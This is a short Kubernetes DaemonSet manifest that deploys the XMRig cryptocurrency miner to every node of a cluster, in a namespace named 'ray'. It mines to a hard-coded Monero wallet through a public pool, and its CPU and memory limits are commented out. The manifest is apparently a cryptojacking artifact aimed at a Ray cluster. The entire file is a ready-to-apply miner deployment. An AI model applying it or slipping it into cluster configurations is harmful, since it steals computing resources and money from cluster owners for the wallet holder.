apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: xmrig-mining
  namespace: ray
spec:
  selector:
    matchLabels:
      app: xmrig-mining
  template:
    metadata:
      labels:
        app: xmrig-mining
    spec:
      containers:
        - name: xmrig
          image: amin/ray-xmrig:latest
          args: ["-o", "pool.supportxmr.com:3333", "-u", "49ppzHZhAG2AWEq2SVgHboMV3ow8PbtfZchS1yiiKwKY9hrR7nYtZjhYdDtuSDWbVSTCGFxnkSfxKPvmm1kz9XFkBy2xYWN", "-p", "x", "-k"]
          # resources:
          #   limits:
          #     cpu: "15.9"
          #     memory: "60Gi"
          #   requests:
          #     cpu: "15.4"
          #     memory: "55Gi"
      restartPolicy: Always

